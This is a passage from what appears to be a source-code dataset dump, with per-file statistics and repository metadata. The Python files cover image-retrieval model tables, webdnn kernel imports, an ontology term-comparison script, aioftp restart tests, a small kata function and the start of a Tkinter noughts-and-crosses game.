'resnet50-gem' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet50-gem-whiten-f15da7b.pth',
'resnet101-mac-r' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-mac-r-whiten-9df41d3.pth',
'resnet101-gem' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-gem-whiten-22ab0c1.pth',
'resnet101-gem-r' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-gem-r-whiten-b379c0a.pth',
'resnet101-gemmp' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-gemmp-whiten-770f53c.pth',
'resnet152-gem' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet152-gem-whiten-abe7b93.pth',
'densenet121-gem' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-densenet121-gem-whiten-79e3eea.pth',
'densenet169-gem' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-densenet169-gem-whiten-6b2a76a.pth',
'densenet201-gem' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-densenet201-gem-whiten-22ea45c.pth',
}
# output dimensionality for supported architectures
OUTPUT_DIM = {
'alexnet' : 256,
'vgg11' : 512,
'vgg13' : 512,
'vgg16' : 512,
'vgg19' : 512,
'resnet18' : 512,
'resnet34' : 512,
'resnet50' : 2048,
'resnet101' : 2048,
'resnet152' : 2048,
'densenet121' : 1024,
'densenet169' : 1664,
'densenet201' : 1920,
'densenet161' : 2208, # largest densenet
'squeezenet1_0' : 512,
'squeezenet1_1' : 512,
}
OUTPUT_DIM = {
'alexnet' : 256,
'vgg11' : 512,
'vgg13' : 512,
'vgg16' : 512,
'vgg19' : 512,
'resnet18' : 512,
'resnet34' : 512,
'resnet50' : 2048,
'resnet101' : 2048,
'resnet152' : 2048,
'densenet121' : 1024,
'densenet161' : 2208,
'densenet169' : 1664,
'densenet201' : 1920,
'densenet264' : 2688, # largest densenet
'squeezenet1_0' : 512,
'squeezenet1_1' : 512,
}
| 61.0125
| 163
| 0.646179
| 576
| 4,881
| 5.461806
| 0.206597
| 0.144946
| 0.193261
| 0.090591
| 0.704704
| 0.704704
| 0.704704
| 0.704704
| 0.676097
| 0.639224
| 0
| 0.12133
| 0.211432
| 4,881
| 79
| 164
| 61.78481
| 0.696025
| 0.151813
| 0
| 0.557377
| 0
| 0.295082
| 0.669576
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c181ff11834299c00661a8fdc3dd79104b3e3f64
| 230
|
py
|
Python
|
functions.py
|
JoSchmutz/sonnette-
|
7218579db92f11cb0e1bd22cb66b5a3b9b4f5aa4
|
[
"Apache-2.0"
] | null | null | null |
functions.py
|
JoSchmutz/sonnette-
|
7218579db92f11cb0e1bd22cb66b5a3b9b4f5aa4
|
[
"Apache-2.0"
] | null | null | null |
functions.py
|
JoSchmutz/sonnette-
|
7218579db92f11cb0e1bd22cb66b5a3b9b4f5aa4
|
[
"Apache-2.0"
] | null | null | null |
import math
def cercle(largeurImg, hauteurImg, rayonCercle, centreCercle, precision):
return [(rayonCercle*(1+math.cos(2*math.pi/precision*x)),rayonCercle*(1+math.sin(2*math.pi/precision*x))) for x in xrange(0,precision+1)]
| 38.333333
| 141
| 0.747826
| 35
| 230
| 4.914286
| 0.571429
| 0.139535
| 0.186047
| 0.186047
| 0.197674
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.086957
| 230
| 5
| 142
| 46
| 0.790476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c1d20cc46be93b8bddcc3d7caf477f908e80c47a
| 3,534
|
py
|
Python
|
src/graph_transpiler/webdnn/backend/webassembly/kernels/__init__.py
|
steerapi/webdnn
|
1df51cc094e5a528cfd3452c264905708eadb491
|
[
"MIT"
] | null | null | null |
src/graph_transpiler/webdnn/backend/webassembly/kernels/__init__.py
|
steerapi/webdnn
|
1df51cc094e5a528cfd3452c264905708eadb491
|
[
"MIT"
] | null | null | null |
src/graph_transpiler/webdnn/backend/webassembly/kernels/__init__.py
|
steerapi/webdnn
|
1df51cc094e5a528cfd3452c264905708eadb491
|
[
"MIT"
] | null | null | null |
from webdnn.backend.webassembly.kernels import abs
from webdnn.backend.webassembly.kernels import acos
from webdnn.backend.webassembly.kernels import acosh
from webdnn.backend.webassembly.kernels import arg_max
from webdnn.backend.webassembly.kernels import arg_min
from webdnn.backend.webassembly.kernels import asin
from webdnn.backend.webassembly.kernels import asinh
from webdnn.backend.webassembly.kernels import atan
from webdnn.backend.webassembly.kernels import atanh
from webdnn.backend.webassembly.kernels import average_pooling_2d
from webdnn.backend.webassembly.kernels import broadcast
from webdnn.backend.webassembly.kernels import clipped_relu
from webdnn.backend.webassembly.kernels import col2im
from webdnn.backend.webassembly.kernels import concat
from webdnn.backend.webassembly.kernels import cos
from webdnn.backend.webassembly.kernels import cosh
from webdnn.backend.webassembly.kernels import depth2space
from webdnn.backend.webassembly.kernels import elementwise
from webdnn.backend.webassembly.kernels import elementwise_add
from webdnn.backend.webassembly.kernels import elementwise_div
from webdnn.backend.webassembly.kernels import elementwise_mul
from webdnn.backend.webassembly.kernels import elementwise_pow
from webdnn.backend.webassembly.kernels import elu
from webdnn.backend.webassembly.kernels import embedding
from webdnn.backend.webassembly.kernels import exp
from webdnn.backend.webassembly.kernels import greater
from webdnn.backend.webassembly.kernels import greater_equal
from webdnn.backend.webassembly.kernels import hard_sigmoid
from webdnn.backend.webassembly.kernels import im2col
from webdnn.backend.webassembly.kernels import leaky_relu
from webdnn.backend.webassembly.kernels import local_response_normalization
from webdnn.backend.webassembly.kernels import log
from webdnn.backend.webassembly.kernels import lstm
from webdnn.backend.webassembly.kernels import max
from webdnn.backend.webassembly.kernels import max_pooling_2d
from webdnn.backend.webassembly.kernels import min
from webdnn.backend.webassembly.kernels import prod
from webdnn.backend.webassembly.kernels import reinterpret_axis
from webdnn.backend.webassembly.kernels import relu
from webdnn.backend.webassembly.kernels import reshape
from webdnn.backend.webassembly.kernels import rsqrt
from webdnn.backend.webassembly.kernels import scalar_add
from webdnn.backend.webassembly.kernels import scalar_mul
from webdnn.backend.webassembly.kernels import scalar_pow
from webdnn.backend.webassembly.kernels import select
from webdnn.backend.webassembly.kernels import sigmoid
from webdnn.backend.webassembly.kernels import sin
from webdnn.backend.webassembly.kernels import sinh
from webdnn.backend.webassembly.kernels import slice
from webdnn.backend.webassembly.kernels import softmax
from webdnn.backend.webassembly.kernels import softplus
from webdnn.backend.webassembly.kernels import softsign
from webdnn.backend.webassembly.kernels import space2depth
from webdnn.backend.webassembly.kernels import split_axis
from webdnn.backend.webassembly.kernels import sum
from webdnn.backend.webassembly.kernels import tan
from webdnn.backend.webassembly.kernels import tanh
from webdnn.backend.webassembly.kernels import tensordot
from webdnn.backend.webassembly.kernels import threshold_relu
from webdnn.backend.webassembly.kernels import tile
from webdnn.backend.webassembly.kernels import transpose
from webdnn.backend.webassembly.kernels import unpooling_2d
from webdnn.backend.webassembly.kernels import zero_padding_1d
| 55.21875
| 75
| 0.875212
| 466
| 3,534
| 6.583691
| 0.154506
| 0.205346
| 0.349087
| 0.574967
| 0.90189
| 0.90189
| 0.447523
| 0.032595
| 0
| 0
| 0
| 0.002438
| 0.071307
| 3,534
| 63
| 76
| 56.095238
| 0.932358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c1e0288289918c5c7574800cd8c6c91b609a95ef
| 6,935
|
py
|
Python
|
ate-006-thd.py
|
svetlanama/snowball
|
a41865a866dae124b4a22134f091a7d09bd0896e
|
[
"MIT"
] | null | null | null |
ate-006-thd.py
|
svetlanama/snowball
|
a41865a866dae124b4a22134f091a7d09bd0896e
|
[
"MIT"
] | null | null | null |
ate-006-thd.py
|
svetlanama/snowball
|
a41865a866dae124b4a22134f091a7d09bd0896e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env file
# -*- coding: utf-8 -*-
import pandas as pd
import libthd as thd
print("\n\n\n============\n")
files = (
('ontology-1/terms/W2D0000000001.csv', 'ontology-1/terms-clean/W2D0000000001.csv'),
('ontology-1/terms/W2D0000000002.csv', 'ontology-1/terms-clean/W2D0000000002.csv'),
('ontology-1/terms/W2D0000000003.csv', 'ontology-1/terms-clean/W2D0000000003.csv'),
('ontology-1/terms/W2D0000000004.csv', 'ontology-1/terms-clean/W2D0000000004.csv'),
('ontology-1/terms/W2D0000000005.csv', 'ontology-1/terms-clean/W2D0000000005.csv'),
('ontology-1/terms/W2D0000000006.csv', 'ontology-1/terms-clean/W2D0000000006.csv'),
('ontology-1/terms/W2D0000000007.csv', 'ontology-1/terms-clean/W2D0000000007.csv'),
('ontology-1/terms/W2D0000000008.csv', 'ontology-1/terms-clean/W2D0000000008.csv'),
('ontology-1/terms/W2D0000000009.csv', 'ontology-1/terms-clean/W2D0000000009.csv'),
('ontology-1/terms/W2D0000000010.csv', 'ontology-1/terms-clean/W2D0000000010.csv'),
('ontology-1/terms/W2D0000000011.csv', 'ontology-1/terms-clean/W2D0000000011.csv'),
('ontology-1/terms/W2D0000000012.csv', 'ontology-1/terms-clean/W2D0000000012.csv'),
('ontology-1/terms/W2D0000000013.csv', 'ontology-1/terms-clean/W2D0000000013.csv')
# ('ontology-1-baseline-acm/terms/W2D0000000001.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000001.csv'),
# ('ontology-1-baseline-acm/terms/W2D0000000002.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000002.csv'),
# ('ontology-1-baseline-acm/terms/W2D0000000003.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000003.csv'),
# ('ontology-1-baseline-acm/terms/W2D0000000004.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000004.csv'),
# ('ontology-1-baseline-acm/terms/W2D0000000005.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000005.csv'),
# ('ontology-1-baseline-acm/terms/W2D0000000006.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000006.csv'),
# ('ontology-1-baseline-acm/terms/W2D0000000007.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000007.csv'),
# ('ontology-1-baseline-acm/terms/W2D0000000008.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000008.csv'),
# ('ontology-1-baseline-acm/terms/W2D0000000009.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000009.csv'),
# ('ontology-1-baseline-acm/terms/W2D0000000010.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000010.csv'),
# ('ontology-1-baseline-acm/terms/W2D0000000011.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000011.csv'),
#
# ('ontology-1-baseline-google-scholar/terms/W2D0000000001.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000001.csv'),
# ('ontology-1-baseline-google-scholar/terms/W2D0000000002.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000002.csv'),
# ('ontology-1-baseline-google-scholar/terms/W2D0000000003.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000003.csv'),
# ('ontology-1-baseline-google-scholar/terms/W2D0000000004.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000004.csv'),
# ('ontology-1-baseline-google-scholar/terms/W2D0000000005.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000005.csv'),
# ('ontology-1-baseline-google-scholar/terms/W2D0000000006.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000006.csv'),
# ('ontology-1-baseline-google-scholar/terms/W2D0000000007.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000007.csv'),
# ('ontology-1-baseline-google-scholar/terms/W2D0000000008.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000008.csv'),
# ('ontology-1-baseline-google-scholar/terms/W2D0000000009.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000009.csv'),
# ('ontology-1-baseline-google-scholar/terms/W2D0000000010.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000010.csv'),
# ('ontology-1-baseline-google-scholar/terms/W2D0000000011.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000011.csv'),
# ('ontology-1-baseline-google-scholar/terms/W2D0000000012.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000012.csv'),
#
# ('ontology-1-baseline-ms-academic/terms/W2D0000000001.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000001.csv'),
# ('ontology-1-baseline-ms-academic/terms/W2D0000000002.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000002.csv'),
# ('ontology-1-baseline-ms-academic/terms/W2D0000000003.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000003.csv'),
# ('ontology-1-baseline-ms-academic/terms/W2D0000000004.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000004.csv'),
# ('ontology-1-baseline-ms-academic/terms/W2D0000000005.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000005.csv'),
# ('ontology-1-baseline-ms-academic/terms/W2D0000000006.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000006.csv'),
# ('ontology-1-baseline-ms-academic/terms/W2D0000000007.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000007.csv'),
# ('ontology-1-baseline-ms-academic/terms/W2D0000000008.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000008.csv'),
# ('ontology-1-baseline-ms-academic/terms/W2D0000000009.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000009.csv'),
# ('ontology-1-baseline-ms-academic/terms/W2D0000000010.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000010.csv'),
# ('ontology-1-baseline-ms-academic/terms/W2D0000000011.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000011.csv'),
# ('ontology-1-baseline-ms-academic/terms/W2D0000000012.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000012.csv'),
# ('ontology-1-baseline-ms-academic/terms/W2D0000000013.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000013.csv'),
# ('speechsegmentation/terms/W2D0000000001.csv', 'speechsegmentation/terms-clean/W2D0000000001.csv'),
# ('speechsegmentation/terms/W2D0000000002.csv', 'speechsegmentation/terms-clean/W2D0000000002.csv'),
# ('speechsegmentation/terms/W2D0000000003.csv', 'speechsegmentation/terms-clean/W2D0000000003.csv'),
)
for i in range (0, len(files)-1):
print "------starting new iteration--------"
df_T1 = pd.read_csv(files[i][1], sep=";", header=None, names=['term', 'cvalue']).set_index('term')
df_T2 = pd.read_csv(files[i+1][1], sep=";", header=None, names=['term', 'cvalue']).set_index('term')
val_eps, val_thd, val_thdr = thd.thd(df_T1, df_T2)
print(files[i], files[i+1], 'eps',val_eps, 'thdr=', val_thdr, 'thd=', val_thd)
| 97.676056
| 136
| 0.717952
| 855
| 6,935
| 5.807018
| 0.076023
| 0.177644
| 0.234441
| 0.29003
| 0.903726
| 0.817925
| 0.716213
| 0.536354
| 0.064451
| 0.064451
| 0
| 0.200833
| 0.10036
| 6,935
| 70
| 137
| 99.071429
| 0.594967
| 0.724009
| 0
| 0
| 0
| 0
| 0.567148
| 0.514714
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.083333
| null | null | 0.125
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a9dd87af86fc158afeef8a3559c597fc5a6de69d
| 199
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pylib_multi_phy_model/protocol_reference_files/parts/nixi/z_wave_KR_validation_testing.py
|
PascalGuenther/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pylib_multi_phy_model/protocol_reference_files/parts/nixi/z_wave_KR_validation_testing.py
|
PascalGuenther/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pylib_multi_phy_model/protocol_reference_files/parts/nixi/z_wave_KR_validation_testing.py
|
PascalGuenther/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from ..nerio.z_wave_KR_validation_testing import z_wave_KR_validation_testing as z_wave_KR_validation_testing_nerio
class z_wave_KR_validation_testing(z_wave_KR_validation_testing_nerio):
pass
| 33.166667
| 115
| 0.894472
| 33
| 199
| 4.727273
| 0.333333
| 0.160256
| 0.224359
| 0.544872
| 0.833333
| 0.371795
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075377
| 199
| 5
| 116
| 39.8
| 0.847826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
e73916849e16359b3ba6fd19aae86cb74bb31da9
| 4,603
|
py
|
Python
|
tests/test-restart.py
|
maurice0918/aioftp
|
a3967472bad8ce1ad255e08bd1bc8725dc5188ce
|
[
"Apache-2.0"
] | null | null | null |
tests/test-restart.py
|
maurice0918/aioftp
|
a3967472bad8ce1ad255e08bd1bc8725dc5188ce
|
[
"Apache-2.0"
] | null | null | null |
tests/test-restart.py
|
maurice0918/aioftp
|
a3967472bad8ce1ad255e08bd1bc8725dc5188ce
|
[
"Apache-2.0"
] | null | null | null |
import nose
from common import * # noqa
import aioftp
@aioftp_setup(
server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_retr_0(loop, client, server, *, tmp_dir):
tmp_file = tmp_dir / "foo.txt"
with tmp_file.open(mode="w") as fout:
fout.write("foobar")
await client.login()
async with client.download_stream("foo.txt", offset=0) as stream:
r = await stream.read()
await client.quit()
tmp_file.unlink()
nose.tools.eq_(r, b"foobar")
@aioftp_setup(
server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_retr_3(loop, client, server, *, tmp_dir):
tmp_file = tmp_dir / "foo.txt"
with tmp_file.open(mode="w") as fout:
fout.write("foobar")
await client.login()
async with client.download_stream("foo.txt", offset=3) as stream:
r = await stream.read()
await client.quit()
tmp_file.unlink()
nose.tools.eq_(r, b"bar")
@aioftp_setup(
server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_retr_100(loop, client, server, *, tmp_dir):
tmp_file = tmp_dir / "foo.txt"
with tmp_file.open(mode="w") as fout:
fout.write("foobar")
await client.login()
async with client.download_stream("foo.txt", offset=100) as stream:
r = await stream.read()
await client.quit()
tmp_file.unlink()
nose.tools.eq_(r, b"")
@aioftp_setup(
server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_stor_0(loop, client, server, *, tmp_dir):
tmp_file = tmp_dir / "foo.txt"
await client.login()
async with client.upload_stream("foo.txt", offset=0) as stream:
await stream.write(b"foobar")
await client.quit()
with tmp_file.open(mode="rb") as fin:
r = fin.read()
tmp_file.unlink()
nose.tools.eq_(r, b"foobar")
@aioftp_setup(
server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_stor_3(loop, client, server, *, tmp_dir):
tmp_file = tmp_dir / "foo.txt"
with tmp_file.open(mode="w") as fout:
fout.write("foobar")
await client.login()
async with client.upload_stream("foo.txt", offset=3) as stream:
await stream.write(b"foo")
await client.quit()
with tmp_file.open(mode="rb") as fin:
r = fin.read()
tmp_file.unlink()
nose.tools.eq_(r, b"foofoo")
@aioftp_setup(
server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_stor_10(loop, client, server, *, tmp_dir):
tmp_file = tmp_dir / "foo.txt"
with tmp_file.open(mode="w") as fout:
fout.write("foobar")
await client.login()
async with client.upload_stream("foo.txt", offset=10) as stream:
await stream.write(b"foo")
await client.quit()
with tmp_file.open(mode="rb") as fin:
r = fin.read()
tmp_file.unlink()
nose.tools.eq_(r, b"foobar" + b"\x00" * 4 + b"foo")
@aioftp_setup(
server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_appe_10(loop, client, server, *, tmp_dir):
tmp_file = tmp_dir / "foo.txt"
with tmp_file.open(mode="w") as fout:
fout.write("foobar")
await client.login()
async with client.append_stream("foo.txt", offset=10) as stream:
await stream.write(b"foo")
await client.quit()
with tmp_file.open(mode="rb") as fin:
r = fin.read()
tmp_file.unlink()
nose.tools.eq_(r, b"foobar" + b"\x00" * 4 + b"foo")
@aioftp_setup(
server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_reset(loop, client, server, *, tmp_dir):
tmp_file = tmp_dir / "foo.txt"
with tmp_file.open(mode="w") as fout:
fout.write("foobar")
await client.login()
await client.command("REST 3", "350")
async with client.download_stream("foo.txt") as stream:
r = await stream.read()
await client.quit()
tmp_file.unlink()
nose.tools.eq_(r, b"foobar")
@aioftp_setup(
server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@expect_codes_in_exception("501")
@with_connection
async def test_restart_syntax_error(loop, client, server):
await client.login()
await client.command("REST 3abc", "350")
| 22.563725
| 71
| 0.645883
| 684
| 4,603
| 4.141813
| 0.105263
| 0.066714
| 0.05083
| 0.058242
| 0.938581
| 0.938581
| 0.93258
| 0.894811
| 0.894811
| 0.894811
| 0
| 0.010473
| 0.190962
| 4,603
| 203
| 72
| 22.674877
| 0.750269
| 0.000869
| 0
| 0.790698
| 0
| 0
| 0.079617
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.023256
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e75d282b9a5661fc6eb821b792676f6b758eebba
| 97
|
py
|
Python
|
python/8Kyu/Thinkful - Dictionary drills Order filler.py
|
athasv/Codewars-data
|
5e106466e709fd776f23585ad9f652d0d65b48d3
|
[
"MIT"
] | null | null | null |
python/8Kyu/Thinkful - Dictionary drills Order filler.py
|
athasv/Codewars-data
|
5e106466e709fd776f23585ad9f652d0d65b48d3
|
[
"MIT"
] | null | null | null |
python/8Kyu/Thinkful - Dictionary drills Order filler.py
|
athasv/Codewars-data
|
5e106466e709fd776f23585ad9f652d0d65b48d3
|
[
"MIT"
] | null | null | null |
def fillable(stock, merch, n):
return True if merch in stock and stock[merch] >= n else False
| 48.5
| 66
| 0.71134
| 17
| 97
| 4.058824
| 0.705882
| 0.289855
| 0.318841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195876
| 97
| 2
| 66
| 48.5
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
e784f4949ee2ccae14e498788b10c0653a6b09db
| 109,674
|
pyw
|
Python
|
Script/Noughts and Crosses.pyw
|
AniketWithPython/Noughts-and-Crosses
|
8402839d12b103efca979195d19899ec55ed4780
|
[
"TCL",
"MIT"
] | null | null | null |
Script/Noughts and Crosses.pyw
|
AniketWithPython/Noughts-and-Crosses
|
8402839d12b103efca979195d19899ec55ed4780
|
[
"TCL",
"MIT"
] | null | null | null |
Script/Noughts and Crosses.pyw
|
AniketWithPython/Noughts-and-Crosses
|
8402839d12b103efca979195d19899ec55ed4780
|
[
"TCL",
"MIT"
] | null | null | null |
#Noughts and Crosses (Tkinter Edition) By Aniket Maity
#Copyright 2021 Aniket Maity
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
#to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
#and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from tkinter import *
from webbrowser import open
l=["X","O"]
status={}
check=[['b1','b2','b3'],['b4','b5','b6'],['b7','b8','b9'],['b1','b4','b7'],['b2','b5','b8'],['b3','b6','b9'],['b1','b5','b9'],['b3','b5','b7']]
def button(a):
global pop,rep,root
pop.destroy()
root.destroy()
if a==None:
raise SystemExit
rep=a
def popfunc():
raise SystemExit
def winnerpop(text):
global pop,rep,root
pop=Toplevel()
pop.grab_set()
photo=PhotoImage(data=b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x06\x00\x00\x00szz\xf4\x00\x00\x00\x01sRGB\x00\xae\xce\x1c\xe9\x00\x00\x00\x04gAMA\x00\x00\xb1\x8f\x0b\xfca\x05\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x03\x95IDATXG\xc5\x96Mh\x1ce\x18\xc7\x7f\xb3\xb3\xbb\xc9dw\xf3\xb5\xd9&-\xbb\xa9E\xd3\xc6|\xb4\x92\xd4\xaa\x8d6\xfd\x10\x0f\x96\x9e\xea\x07\xa8 